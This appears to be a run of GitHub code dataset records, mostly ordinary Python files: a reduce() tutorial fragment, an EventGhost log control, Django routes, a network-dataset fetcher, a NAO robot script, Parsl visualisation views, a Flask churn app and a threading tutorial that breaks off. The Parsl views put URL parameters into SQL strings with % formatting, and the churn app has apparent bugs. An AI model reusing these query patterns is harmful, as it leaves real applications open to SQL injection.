表达式必须是二元函数(两个操作数),如果有初始值,则先把初始值和序列的第一个元素作为函数参数,求得返回值后,\n再将返回值和序列的第二个元素作为函数参数,依此类推,直至序列最后一个元素。如果省略初始值,则先把序列的第一个和第二个元素作为函数参数,求得返回值后,\n再将返回值和序列的第三个元素作为函数参数,依此类推,直至序列最后一个元素。\n注意:Python3.x reduce() 已经被移到 functools 模块里,如果我们要使用,需要引入 functools 模块来调用 reduce() 函数\n'''\n\nfrom functools import reduce\nprint(reduce(lambda x, y : x * y, [1, 2, 3, 4, 5, 6], 10))","repo_name":"jzhangCSER01/LearningPython","sub_path":"22-6-7/chapter04/ch4-14.2.py","file_name":"ch4-14.2.py","file_ext":"py","file_size_in_byte":2256,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"39309722538","text":"# -*- coding: utf-8 -*-\r\n\r\n# This file is part of EventGhost.\r\n# Copyright (C) 2005 Lars-Peter Voss \r\n#\r\n# EventGhost is free software; you can redistribute it and/or modify\r\n# it under the terms of the GNU General Public License as published by\r\n# the Free Software Foundation; either version 2 of the License, or\r\n# (at your option) any later version.\r\n#\r\n# EventGhost is distributed in the hope that it will be useful,\r\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n# GNU General Public License for more details.\r\n#\r\n# You should have received a copy of the GNU General Public License\r\n# along with EventGhost; if not, write to the Free Software\r\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA\r\n#\r\n\r\n\r\nimport eg\r\nimport wx\r\nimport collections\r\nfrom time import strftime, localtime\r\nimport wx.lib.mixins.listctrl as listmix\r\n\r\n\r\nEVENT_ICON = eg.EventItem.icon\r\nERROR_ICON = eg.Icons.ERROR_ICON\r\n\r\n\r\nclass LogCtrl(wx.ListCtrl, listmix.ListCtrlAutoWidthMixin):\r\n \"\"\"Implementation of a ListCtrl with a circular buffer.\"\"\"\r\n\r\n def __init__(self, parent):\r\n self.maxlength = 2000\r\n self.removeOnMax = 200\r\n self.indent = \"\"\r\n self.OnGetItemText = self.OnGetItemTextWithTime\r\n wx.ListCtrl.__init__(\r\n self,\r\n parent,\r\n style=(\r\n wx.LC_REPORT\r\n |wx.LC_VIRTUAL\r\n |wx.NO_FULL_REPAINT_ON_RESIZE\r\n |wx.HSCROLL\r\n |wx.CLIP_CHILDREN\r\n |wx.LC_NO_HEADER\r\n )\r\n )\r\n if eg.config.useFixedFont:\r\n df = self.GetFont()\r\n font = wx.Font(df.GetPointSize(), wx.DEFAULT, wx.NORMAL, wx.NORMAL, False, \"Courier New\")\r\n self.SetFont(font)\r\n listmix.ListCtrlAutoWidthMixin.__init__(self)\r\n self.SetImageList(eg.Icons.gImageList, wx.IMAGE_LIST_SMALL)\r\n\r\n sysColour = eg.colour.windowBackground\r\n sysTextColour = eg.colour.windowText\r\n oddColour = eg.colour.GetOddLogColour()\r\n\r\n self.attr1 = wx.ListItemAttr()\r\n self.attr1.BackgroundColour = oddColour\r\n self.attr1.TextColour = sysTextColour\r\n\r\n self.attr2 = wx.ListItemAttr()\r\n self.attr2.BackgroundColour = sysColour\r\n self.attr2.TextColour = sysTextColour\r\n\r\n self.attr3 = wx.ListItemAttr()\r\n self.attr3.BackgroundColour = oddColour\r\n self.attr3.TextColour = (255, 0, 0)\r\n\r\n self.attr4 = wx.ListItemAttr()\r\n self.attr4.BackgroundColour = sysColour\r\n self.attr4.TextColour = (255, 0, 0)\r\n\r\n self.InsertColumn(0, \"\")\r\n\r\n # logger popup menu\r\n menu = wx.Menu()\r\n menu.Append(wx.ID_COPY, eg.text.MainFrame.Menu.Copy)\r\n self.Bind(wx.EVT_MENU, self.OnCmdCopy, id=wx.ID_COPY)\r\n menu.AppendSeparator()\r\n menuId = wx.NewId()\r\n menu.Append(menuId, eg.text.MainFrame.Menu.ClearLog)\r\n self.Bind(wx.EVT_MENU, self.OnCmdClearLog, id=menuId)\r\n self.contextMenu = menu\r\n\r\n self.Bind(wx.EVT_RIGHT_UP, self.OnRightUp)\r\n self.Bind(wx.EVT_LIST_ITEM_RIGHT_CLICK, self.OnRightUp)\r\n self.Bind(wx.EVT_LIST_BEGIN_DRAG, self.OnStartDrag)\r\n self.Bind(wx.EVT_LEFT_DCLICK, self.OnDoubleClick)\r\n self.Bind(wx.EVT_SET_FOCUS, self.OnSetFocus)\r\n self.Bind(wx.EVT_KILL_FOCUS, self.OnKillFocus)\r\n\r\n self.logTimes = True\r\n self.__inSelection = False\r\n self.isOdd = False\r\n self.data = collections.deque()\r\n eg.log.SetCtrl(self)\r\n self.SetData(eg.log.GetData())\r\n\r\n\r\n @eg.LogIt\r\n def Destroy(self):\r\n eg.log.SetCtrl(None)\r\n\r\n\r\n def OnSetFocus(self, event):\r\n eg.Notify(\"FocusChange\", self)\r\n event.Skip()\r\n\r\n\r\n def OnKillFocus(self, event):\r\n eg.Notify(\"FocusChange\", None)\r\n event.Skip()\r\n\r\n\r\n @eg.AssertNotMainThread\r\n def SetData(self, data):\r\n #self.Freeze()\r\n self.data = collections.deque(data)\r\n self.SetItemCount(len(data))\r\n #self.Thaw()\r\n self.ScrollList(0, 1000000)\r\n\r\n\r\n def SetTimeLogging(self, flag):\r\n self.logTimes = flag\r\n if flag:\r\n self.OnGetItemText = self.OnGetItemTextWithTime\r\n else:\r\n self.OnGetItemText = self.OnGetItemTextNormal\r\n self.Refresh()\r\n\r\n\r\n def SetIndent(self, shouldIndent):\r\n if shouldIndent:\r\n self.indent = \" \"\r\n else:\r\n self.indent = \"\"\r\n self.Refresh()\r\n\r\n\r\n def OnStartDrag(self, event):\r\n idx = event.GetIndex()\r\n itemData = self.GetItemData(idx)\r\n if itemData[1] != EVENT_ICON:\r\n return\r\n text = itemData[2]\r\n # create our own data format and use it in a\r\n # custom data object\r\n customData = wx.CustomDataObject(wx.CustomDataFormat(\"DragItem\"))\r\n customData.SetData(text.encode(\"utf-8\"))\r\n\r\n # And finally, create the drop source and begin the drag\r\n # and drop operation\r\n dropSource = wx.DropSource(self)\r\n dropSource.SetData(customData)\r\n result = dropSource.DoDragDrop(wx.Drag_AllowMove)\r\n if result == wx.DragMove:\r\n self.Refresh()\r\n\r\n\r\n def CanCut(self):\r\n return False\r\n\r\n\r\n def CanCopy(self):\r\n return self.GetSelectedItemCount() > 0\r\n\r\n\r\n def CanPaste(self):\r\n return False\r\n\r\n\r\n def Copy(self):\r\n self.OnCmdCopy()\r\n\r\n\r\n def OnCmdCopy(self, dummyEvent=None):\r\n text = \"\"\r\n lines = 1\r\n firstItem = item = self.GetNextItem(\r\n -1,\r\n wx.LIST_NEXT_ALL,\r\n wx.LIST_STATE_SELECTED\r\n )\r\n if item != -1:\r\n text = self.OnGetItemText(item, 0)[1:]\r\n item = self.GetNextItem(\r\n item,\r\n wx.LIST_NEXT_ALL,\r\n wx.LIST_STATE_SELECTED\r\n )\r\n while item != -1:\r\n lines += 1\r\n text += \"\\r\\n\" + self.OnGetItemText(item, 0)[1:]\r\n item = self.GetNextItem(\r\n item,\r\n wx.LIST_NEXT_ALL,\r\n wx.LIST_STATE_SELECTED\r\n )\r\n if text != \"\" and wx.TheClipboard.Open():\r\n textDataObject = wx.TextDataObject(text)\r\n dataObjectComposite = wx.DataObjectComposite()\r\n dataObjectComposite.Add(textDataObject)\r\n if lines == 1:\r\n eventstring, icon = self.GetItemData(firstItem)[:2]\r\n if icon == EVENT_ICON:\r\n customDataObject = wx.CustomDataObject(\"DragEventItem\")\r\n customDataObject.SetData(eventstring.encode(\"UTF-8\"))\r\n dataObjectComposite.Add(customDataObject)\r\n\r\n wx.TheClipboard.SetData(dataObjectComposite)\r\n wx.TheClipboard.Close()\r\n wx.TheClipboard.Flush()\r\n\r\n\r\n def OnCmdClearLog(self, dummyEvent=None):\r\n self.SetItemCount(0)\r\n self.DeleteAllItems()\r\n self.data.clear()\r\n eg.log.data.clear()\r\n self.ScrollList(0, 1000000)\r\n self.Refresh()\r\n\r\n\r\n def OnRightUp(self, dummyEvent):\r\n self.PopupMenu(self.contextMenu)\r\n\r\n\r\n def OnDoubleClick(self, event):\r\n item, flags = self.HitTest(event.GetPosition())\r\n if flags & wx.LIST_HITTEST_ONITEM:\r\n icon, wref = self.GetItemData(item)[1:3]\r\n if icon != eg.EventItem.icon and wref is not None:\r\n obj = wref()\r\n if obj is not None and not obj.isDeleted:\r\n obj.Select()\r\n\r\n\r\n def GetItemData(self, item):\r\n return self.data[item]\r\n\r\n\r\n def OnGetItemText(self, item, column):\r\n return \"\"\r\n\r\n\r\n def OnGetItemTextNormal(self, item, dummyColumn):\r\n line, _, _, _, indent = self.data[item]\r\n return \" \" + indent * self.indent + line\r\n\r\n\r\n def OnGetItemTextWithTime(self, item, dummyColumn):\r\n line, _, _, when, indent = self.data[item]\r\n return (\r\n strftime(\" %X \", localtime(when))\r\n + indent * self.indent\r\n + line\r\n )\r\n\r\n\r\n def OnGetItemAttr(self, item):\r\n if item % 2 == 0:\r\n if self.data[item][1] != ERROR_ICON:\r\n return self.attr1\r\n else:\r\n return self.attr3\r\n else:\r\n if self.data[item][1] != ERROR_ICON:\r\n return self.attr2\r\n else:\r\n return self.attr4\r\n\r\n\r\n def OnGetItemImage(self, item):\r\n return self.data[item][1].index\r\n\r\n\r\n @eg.AssertNotMainThread\r\n def WriteLine(self, line, icon, wRef, when, indent):\r\n data = self.data\r\n if len(data) >= self.maxlength:\r\n self.Freeze()\r\n for _ in range(self.removeOnMax):\r\n self.DeleteItem(0)\r\n data.popleft()\r\n self.Thaw()\r\n data.append((line, icon, wRef, when, indent))\r\n self.SetItemCount(len(data))\r\n self.ScrollList(0, 1000000)\r\n self.Update()\r\n\r\n\r\n if eg.debugLevel:\r\n @eg.LogIt\r\n def __del__(self):\r\n pass\r\n\r\n","repo_name":"garbear/EventGhost","sub_path":"eg/Classes/MainFrame/LogCtrl.py","file_name":"LogCtrl.py","file_ext":"py","file_size_in_byte":9254,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"74441270965","text":"from django.urls import path, include\nfrom base.views import user_views as views\n\nfrom rest_framework_simplejwt.views import (\n TokenObtainPairView,\n # TokenRefreshView,\n)\n\nurlpatterns = [\n path('login/', views.MyTokenObtainPairView.as_view(), name='token_obtain_pair'),\n path('profile/', views.getUserProfile, name=\"user_profile\"),\n path('register/' , views.registerUser, name=\"register\"),\n]","repo_name":"hoganjameshogan/eshoppe","sub_path":"base/urls/user_urls.py","file_name":"user_urls.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"37392357718","text":"#!/usr/bin/python\n\"\"\"Download network datasets required for running the '{analysis}' notebook\nfrom the `Netzschleuder `_ repository.\n\nThe following datasets are downloaded:\n\n#. Zachary Karate Club network (`karate/78`)\n#. Interpersonal contacts among windsurfer (`windsurfers`)\n#. Friendship between students in a residence hall (`residence_hall`)\n#. Combined network of 10 ego-net samples from Facebook (`ego_social/facebook_combined`)\n#. Facebook friendships within several organizations (`facebook_organizations`)\n#. Network of mentions in the Dutch field of literary criticism (`dutch_criticism`)\n#. Trust between physicians in four American cities (`physician_trust`)\n#. Trust network from Epinions.com (`epinions_trust`)\n#. Trust network among users on Advogato platform (`advogato`)\n#. Strongly connected component of Pretty-Good-Privacy (PGP) web of trust (`pgp_strong`)\n#. Interactome network for the PDZ-domian proteins (`interactome_pdz`)\n#. Joshi-Tope human protein interactome (`reactome`)\n#. A network of human proteins and their binding interactions (`interactome_figeys`)\n#. A network of human proteins and their binding interactions (`interactome_stelzl`)\n#. A network of human proteins and their binding interactions (`interactome_vidal`)\n#. Network of protein-protein interactions in Saccharomyces cerevisiae (`interactome_collins`)\n#. A network of protein-protein binding interactions among yeast proteins (`interactome_yeast`)\n#. Gene transcription factor-based regulation, within the bacteria E. coli (`ecoli_transcription`)\n#. Gene transcription factor-based regulation, within the yeast (`yeast_transcription`)\n\nDetails information including citation data can be found of pages\ncorresponding to individual datasets\n(for instance `https://networks.skewed.de/net/karate`).\n\"\"\"\nimport graph_tool.all as gt\nfrom src import DATA\nfrom src._ns import Netzschleuder\nfrom src._argparse import get_parser\n\n\ndef get_component(idx: int, *, directed: bool = False):\n \"\"\"Component extraction function factory.\"\"\"\n def component_getter(graph):\n comp = gt.label_components(graph, directed=directed)[0].get_array()\n return gt.GraphView(graph, vfilt=comp == idx).copy()\n return component_getter\n\n\ndef fetch(force: bool = False):\n ns = Netzschleuder(DATA/\"domains\", force=force)\n # Metdata\n friendship = dict(domain=\"social\", relation=\"friendship\")\n recognition = dict(domain=\"social\", relation=\"recognition\")\n trust = dict(domain=\"social\", relation=\"trust\")\n interactome = dict(domain=\"biological\", relation=\"interactome\")\n genetic = dict(domain=\"biological\", relation=\"genetic\")\n # Friendship (offline)\n meta = { **friendship, \"desc\": \"offline\" }\n ns(\"karate\").fetch(network=\"78\", **meta, label=\"Karate\")\n ns(\"windsurfers\").fetch(**meta, label=\"Windsurfers\")\n ns(\"residence_hall\").fetch(**meta, label=\"Residence hall\")\n # Friendship (online)\n meta = { **friendship, \"desc\": \"online\" }\n ns(\"ego_social\").fetch(network=\"facebook_combined\", **meta, label=\"FB (ego-nets)\")\n ns(\"facebook_friends\").fetch(**meta, label=\"FB (Maier)\")\n ns(\"facebook_organizations\").fetch(network=\"S1\", **meta, label=\"FB (S1)\")\n ns(\"facebook_organizations\").fetch(network=\"S2\", **meta, label=\"FB (S2)\")\n ns(\"facebook_organizations\").fetch(network=\"M1\", **meta, label=\"FB (M1)\")\n ns(\"facebook_organizations\").fetch(network=\"M2\", **meta, label=\"FB (M2)\")\n ns(\"facebook_organizations\").fetch(network=\"L1\", **meta, label=\"FB (L1)\")\n ns(\"facebook_organizations\").fetch(network=\"L2\", **meta, label=\"FB (L2)\")\n # Recognition (offline)\n meta = { **recognition, \"desc\": \"offline\" }\n ns(\"dutch_criticism\").fetch(**meta, label=\"Dutch criticism\")\n # Trust (offline)\n meta = { **trust, \"desc\": \"offline\" }\n for i in range(4):\n label = f\"Physicians ({i+1})\"\n ns(\"physician_trust\").fetch(\n postprocess=get_component(i),\n alias=str(i+1),\n label=label,\n **meta\n )\n # Recognition (online)\n meta = { **trust, \"desc\": \"online\" }\n ns(\"epinions_trust\").fetch(**meta, label=\"Epinions\")\n ns(\"advogato\").fetch(**meta, label=\"Advogato\")\n ns(\"pgp_strong\").fetch(**meta, label=\"PGP\")\n # Interactomes (PDZ)\n meta = { **interactome, \"desc\": \"PDZ\" }\n ns(\"interactome_pdz\").fetch(**meta, label=\"PDZ\")\n # Interactomes (Human)\n meta = { **interactome, \"desc\": \"human\" }\n ns(\"reactome\").fetch(**meta, label=\"Reactome\")\n ns(\"interactome_figeys\").fetch(**meta, label=\"Figeys\")\n ns(\"interactome_stelzl\").fetch(**meta, label=\"Stelzl\")\n ns(\"interactome_vidal\").fetch(**meta, label=\"Vidal\")\n # Interactomes (yeast)\n meta = { **interactome, \"desc\": \"yeast\" }\n ns(\"collins_yeast\").fetch(**meta, label=\"Collins\")\n ns(\"interactome_yeast\").fetch(**meta, label=\"Coulomb\")\n # Gene transcription\n meta = { **genetic }\n ns(\"ecoli_transcription\").fetch(network=\"v1.1\", **meta, label=\"E. coli\", desc=\"E. coli\")\n ns(\"yeast_transcription\").fetch(**meta, label=\"Yeast\", desc=\"yeast\")\n\n\nif __name__ == \"__main__\":\n parser = get_parser(__file__, __doc__)\n args = parser.parse_args()\n fetch(args.force)\n","repo_name":"sztal/scs-paper","sub_path":"analyses/1-domains/fetch_networks.py","file_name":"fetch_networks.py","file_ext":"py","file_size_in_byte":5223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"72181472246","text":"import qi\nimport time\nfrom naoqi import ALProxy\n\nIP = \"128.237.247.249\"\nPORT = 9559\n\ntts = ALProxy(\"ALTextToSpeech\", IP, int(PORT))\n#tts.say(\"mai hu don\")\n\nsession = qi.Session()\ntry:\n session.connect('tcp://' + IP + ':' + str(PORT))\nexcept:\n raise Exception('connect nahi hua')\n\n\nmotion_service = session.service(\"ALMotion\")\nmotion_service.wakeUp()\nmotion_service.moveTo(1.0, -1.0, 0.0)\ntime.sleep(5)\n","repo_name":"kamatajinkya/hri_project","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"16177185758","text":"from flask import render_template\nfrom flask import current_app as app\nimport pandas as pd\nfrom viz_server.models import *\n\nfrom viz_server.plots.default.workflow_plots import task_gantt_plot, task_per_app_plot, workflow_dag_plot\nfrom viz_server.plots.default.task_plots import time_series_cpu_per_task_plot, time_series_memory_per_task_plot\nfrom viz_server.plots.default.workflow_resource_plots import resource_distribution_plot, resource_time_series\n\ndummy = True\n\n\n@app.route('/')\ndef index():\n workflows = Workflow.query.all()\n for workflow in workflows:\n workflow.status = 'Running'\n if workflow.time_completed is not None:\n workflow.status = 'Completed'\n return render_template('workflows_summary.html', workflows=workflows)\n\n\n@app.route('/workflow//')\ndef workflow(workflow_id):\n workflow_details = Workflow.query.filter_by(run_id=workflow_id).first()\n\n if workflow_details is None:\n return render_template('error.html', message=\"Workflow %s could not be found\" % workflow_id)\n\n# df_task = pd.read_sql_query(\"\"\"SELECT task.task_id, task.task_func_name, task.task_time_submitted,\n# status.timestamp, task.task_time_returned from task, status\n# WHERE task.run_id='%s' and status.run_id=task.run_id and\n# status.task_status_name='running' and status.task_id=task.task_id\"\"\"\n# % (workflow_id), db.engine)\n df_status = pd.read_sql_query(\n \"SELECT run_id, task_id, task_status_name, timestamp FROM status WHERE run_id='%s'\" % workflow_id, db.engine)\n df_task = pd.read_sql_query(\"\"\"SELECT task_id, task_func_name, task_time_submitted,\n task_time_returned, task_time_running from task\n WHERE run_id='%s'\"\"\"\n % (workflow_id), db.engine)\n task_summary = db.engine.execute(\n \"SELECT task_func_name, count(*) as 'frequency' from task WHERE run_id='%s' group by task_func_name;\" % workflow_id)\n\n return render_template('workflow.html',\n workflow_details=workflow_details,\n task_summary=task_summary,\n task_gantt=task_gantt_plot(df_task),\n task_per_app=task_per_app_plot(df_task, df_status))\n\n\n@app.route('/workflow//app/')\ndef parsl_apps(workflow_id):\n workflow_details = Workflow.query.filter_by(run_id=workflow_id).first()\n\n if workflow_details is None:\n return render_template('error.html', message=\"Workflow %s could not be found\" % workflow_id)\n\n task_summary = Task.query.filter_by(run_id=workflow_id)\n return render_template('app.html',\n app_name=\"All Apps\",\n workflow_details=workflow_details,\n task_summary=task_summary)\n\n\n@app.route('/workflow//app/')\ndef parsl_app(workflow_id, app_name):\n workflow_details = Workflow.query.filter_by(run_id=workflow_id).first()\n\n if workflow_details is None:\n return render_template('error.html', message=\"Workflow %s could not be found\" % workflow_id)\n\n task_summary = Task.query.filter_by(\n run_id=workflow_id, task_func_name=app_name)\n return render_template('app.html',\n app_name=app_name,\n workflow_details=workflow_details,\n task_summary=task_summary)\n\n\n@app.route('/workflow//task/')\ndef task(workflow_id, task_id):\n workflow_details = Workflow.query.filter_by(run_id=workflow_id).first()\n\n if workflow_details is None:\n return render_template('error.html', message=\"Workflow %s could not be found\" % workflow_id)\n\n task_details = Task.query.filter_by(\n run_id=workflow_id, task_id=task_id).first()\n task_status = Status.query.filter_by(\n run_id=workflow_id, task_id=task_id).order_by(Status.timestamp)\n\n df_resources = pd.read_sql_query(\n \"SELECT * FROM resource WHERE run_id='%s' AND task_id='%s'\" % (workflow_id, task_id), db.engine)\n\n return render_template('task.html',\n workflow_details=workflow_details,\n task_details=task_details,\n task_status=task_status,\n # time_series_cpu_time=time_series_cpu_per_task_plot(df_resources, 'psutil_process_time_user', 'CPU user time'),\n time_series_cpu_percent=time_series_cpu_per_task_plot(\n df_resources, 'psutil_process_cpu_percent', 'CPU Utilization'),\n time_series_memory_resident=time_series_memory_per_task_plot(\n df_resources, 'psutil_process_memory_resident', 'Memory Usage'),\n # time_series_memory_percent=time_series_memory_per_task_plot(df_resources, 'psutil_process_memory_percent', 'Memory utilization')\n )\n\n\n@app.route('/workflow//dag_')\n@app.route('/workflow//dag_')\ndef workflow_dag_details(workflow_id, path='group_by_apps'):\n workflow_details = Workflow.query.filter_by(run_id=workflow_id).first()\n df_tasks = pd.read_sql_query(\"\"\"SELECT task_id, task_func_name, task_depends,\n task_time_submitted, task_time_returned, task_time_running\n FROM task WHERE run_id='%s' \"\"\"\n % (workflow_id), db.engine)\n\n group_by_apps = (path == \"group_by_apps\")\n return render_template('dag.html',\n workflow_details=workflow_details,\n group_by_apps=group_by_apps,\n workflow_dag_plot=workflow_dag_plot(df_tasks, group_by_apps=group_by_apps))\n\n\n@app.route('/workflow//resource_usage')\ndef workflow_resources(workflow_id):\n workflow_details = Workflow.query.filter_by(run_id=workflow_id).first()\n if workflow_details is None:\n return render_template('error.html', message=\"Workflow %s could not be found\" % workflow_id)\n\n df_resources = pd.read_sql_query(\n \"SELECT * FROM resource WHERE run_id='%s'\" % (workflow_id), db.engine)\n df_task = pd.read_sql_query(\n \"SELECT * FROM task WHERE run_id='%s'\" % (workflow_id), db.engine)\n\n df_task_resources = pd.read_sql_query('''\n SELECT task_id, timestamp, resource_monitoring_interval,\n psutil_process_cpu_percent, psutil_process_time_user,\n psutil_process_memory_percent, psutil_process_memory_resident\n from resource\n where run_id = '%s'\n ''' % (workflow_id), db.engine)\n\n return render_template('resource_usage.html', workflow_details=workflow_details,\n user_time_distribution_avg_plot=resource_distribution_plot(\n df_resources, df_task, type='psutil_process_time_user', label='CPU Time Distribution', option='avg'),\n user_time_distribution_max_plot=resource_distribution_plot(\n df_resources, df_task, type='psutil_process_time_user', label='CPU Time Distribution', option='max'),\n memory_usage_distribution_avg_plot=resource_distribution_plot(\n df_resources, df_task, type='psutil_process_memory_resident', label='Memory Distribution', option='avg'),\n memory_usage_distribution_max_plot=resource_distribution_plot(\n df_resources, df_task, type='psutil_process_memory_resident', label='Memory Distribution', option='max'),\n user_time_time_series=resource_time_series(\n df_task_resources, type='psutil_process_time_user', label='CPU User Time'),\n cpu_percent_time_series=resource_time_series(\n df_task_resources, type='psutil_process_cpu_percent', label='CPU Utilization'),\n memory_percent_time_series=resource_time_series(\n df_task_resources, type='psutil_process_memory_percent', label='Memory Utilization'),\n memory_resident_time_series=resource_time_series(\n df_task_resources, type='psutil_process_memory_resident', label='Memory Usage'),\n )\n","repo_name":"Parsl/viz_server","sub_path":"viz_server/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8772,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"755969977","text":"import datetime as dt\n\nfrom sqlalchemy import Date, Integer, String\nfrom sqlalchemy.orm import Mapped, column_property, mapped_column\n\nfrom bot.database.base import AlchemyBaseModel\n\n\nclass ClassLessons(AlchemyBaseModel):\n \"\"\"Модель для хранения расписания уроков для конкретного класса.\"\"\"\n\n __tablename__ = \"class_lessons\"\n\n id: Mapped[int] = mapped_column(\n Integer,\n primary_key=True,\n autoincrement=True,\n unique=True,\n nullable=False,\n )\n\n date: Mapped[dt.date] = mapped_column(Date, nullable=False)\n grade: Mapped[str] = mapped_column(String(2), nullable=False) # 10 или 11\n letter: Mapped[str] = mapped_column(String(1), nullable=False) # А, Б, В\n class_: Mapped[str] = column_property(grade + letter)\n file_id: Mapped[str] = mapped_column(String(128), nullable=False)\n","repo_name":"K1rL3s/Telegram-UPML-Bot","sub_path":"bot/database/models/class_lessons.py","file_name":"class_lessons.py","file_ext":"py","file_size_in_byte":900,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"38174238499","text":"from flask import Flask, render_template, request\nimport pickle\nimport pandas as pd\nimport numpy as np\n\n\napp = Flask(__name__)\n\nmodel = pickle.load(open('randomforest_classifier.pkl', 'rb'))\n\nstandard_scaler = pickle.load(open('sc.pkl', 'rb'))\n\n\ndef prepare_data(genero, aposentado, casado, dependente, tenure, servico_telefone, multlinhas, servico_internet, seguro_online, backup_online, protecao_celular, suporte_tecnico, streamtv, streammovies, contract, paperless, payment, monthly, total):\n\n colunas = ['Male', 'SeniorCitizen', 'Partner', 'Dependents',\n 'tenure', 'PhoneService', 'MultipleLines', 'InternetService',\n 'OnlineSecurity', 'OnlineBackup', 'DeviceProtection', 'TechSupport',\n 'StreamingTV', 'StreamingMovies', 'Contract', 'PaperlessBilling',\n 'PaymentMethod', 'MonthlyCharges', 'TotalCharges']\n \n is_male = 1 if genero == 'homem' else 0\n is_senior = 1 if aposentado =='sim' else 0 \n is_partner = 1 if casado == 'sim' else 0\n is_dependent = 1 if dependente == 'sim' else 0\n \n is_phoneservice = 1 if servico_telefone == 'sim' else 0\n is_multiplelines = 1 if multlinhas == 'sim' else 0\n \n if servico_internet == 'fibra óptica':\n internetservice = 1\n elif servico_internet == 'dsl':\n internetservice = 2\n elif servico_internet == 'Não':\n internetservice = 0\n \n is_onlinesecurity = 1 if seguro_online == 'sim' else 0\n is_onlinebackup = 1 if backup_online == 'sim' else 0\n is_deviceprotection = 1 if protecao_celular == 'sim' else 0\n is_techsupport = 1 if suporte_tecnico == 'sim' else 0\n is_streamingtv = 1 if streamtv == 'sim' else 0\n is_streamingmovies = 1 if streammovies == 'sim' else 0\n \n if contract == 'dois anos':\n contrato = 12\n elif contract == 'um ano':\n contrato = 12\n elif contract == 'mês':\n contrato = 1\n\n is_paperlessbilling = 1 if paperless == 'sim' else 0\n \n \n if payment == 'cheque eletrônico':\n payment_method = 1\n elif payment == 'cheque por correio':\n payment_method = 2\n elif payment == 'transferência bancária':\n payment_method = 3\n elif payment == 'cartão de crédito automático':\n payment_method = 4\n \n\n dados_entrada = [[is_male],\n [is_senior],\n [is_partner],\n [is_dependent],\n [tenure],\n [is_phoneservice],\n [is_multiplelines], \n [internetservice],\n [is_onlinesecurity],\n [is_onlinebackup],\n [is_deviceprotection],\n [is_techsupport], \n [is_streamingtv], \n [is_streamingmovies],\n [contrato],\n [is_paperlessbilling],\n [payment_method], \n [monthly], \n [total]]\n \n dados_entrada = dict(zip(colunas, dados_entrada))\n X = pd.DataFrame(dados_entrada)\n escalados = standard_scaler.transform(X)\n final = pd.DataFrame(escalados, columns = colunas)\n return final\n \n@app.route('/')\ndef home():\n return render_template('deploy.html')\n\n@app.route('/predict', methods=['POST'])\ndef predict():\n\n features = list(request.form.values())\n genero, aposentado, casado, dependente, tenure, servico_telefone, multlinhas, servico_internet, seguro_online, backup_online, protecao_celular, suporte_tecnico, streamtv, streammovies, contract, paperless, payment, monthly, total = features[0], int(features[1]), int(features[2]), int(features[3]), int(features[4]), int(features[5]), int(features[6]), int(features[7]), int(features[8]), int(features[9]), int(features[10]), int(features[11]), int(features[12]), int(features[13]), int(features[14]), int(features[15]), int(features[16]), int(features[17]), int(features[18])\n final = prepare_data(genero.lower(), aposentado.lower(), casado.lower(), dependente.lower(), tenure, servico_telefone.lower(), multlinhas.lower(), servico_internet.lower(), seguro_online.lower(), backup_online.lower(), protecao_celular.lower(), suporte_tecnico.lower(), streamtv.lower(), streammovies.lower(), contract.lower(), paperless.lower(), payment.lower(), monthly, total)\n pred = rfc.predict(final)\n churn = pred[0]\n return render_template('deploy.html', prediction_text = churn)\n\nif __name__ == \"__main__\":\n app.run()\n","repo_name":"adrianomnn/deploy_projeto_final_awari","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4400,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"39824397479","text":"\"\"\"\nnewer way and faster way of creating threads.\n\nIn python 3.2 the feature added called \"Thread pool executor\" and in lot of cases this is the easier and more efficient to run these threads.\nAnd it also allows to easily switch over to multiple processes instead of threads as well depending on the problem we trying to solve.\n\n\"\"\"\nimport re\nimport time\nimport concurrent.futures\n\n\ndef do_something(sleep_seconds=1, thread_name=None) -> str:\n thread_name = thread_name if thread_name else f\"Thread-{str(sleep_seconds)}\"\n print(\n f'Sleeping the thread {thread_name}, for {sleep_seconds} second(s) ...')\n time.sleep(sleep_seconds)\n return f'{thread_name } Sleeping done ....'\n\n\ndef multi_thread_using_context():\n with concurrent.futures.ThreadPoolExecutor() as executor:\n start = time.perf_counter()\n\n t1 = executor.submit(do_something, 1, \"thread-1\")\n t2 = executor.submit(do_something, 1, \"thread-2\")\n\n print(t1.result())\n print(t2.result())\n\n finish = time.perf_counter()\n # Actual time\n actual_time = round(finish-start, 2)\n print(f'finished in {actual_time} second(s)')\n\n\ndef multi_thread_get_result_using_loop():\n with concurrent.futures.ThreadPoolExecutor() as executor:\n\n start = time.perf_counter()\n\n sleep_seconds = [5, 4, 3, 2, 1]\n\n \"\"\"\n Using general Loop:\n\n futures = []\n for i in sleep_seconds:\n futures.append(executor.submit(do_something, i, f'Thread-{i}'))\n \n for f in concurrent.futures.as_completed(futures):\n print(f.result())\n \"\"\"\n\n # The same general for loop can be written using LIST comprehension.\n futures = [executor.submit(\n do_something, sec, f'Thread-{sec}') for sec in sleep_seconds]\n\n \"\"\"\n An iterator over the given futures that yields each as it completes.\n # Using plain for loop:\n for f in futures:\n print(f.result())\n Returns:\n --------\n An iterator that yields the given Futures as they complete (finished or\n cancelled). If any given Futures are duplicated, they will be returned\n once.\n \"\"\"\n for f in concurrent.futures.as_completed(futures):\n print(f.result())\n\n finish = time.perf_counter()\n # Actual time\n actual_time = round(finish-start, 2)\n print(f'finished in {actual_time} 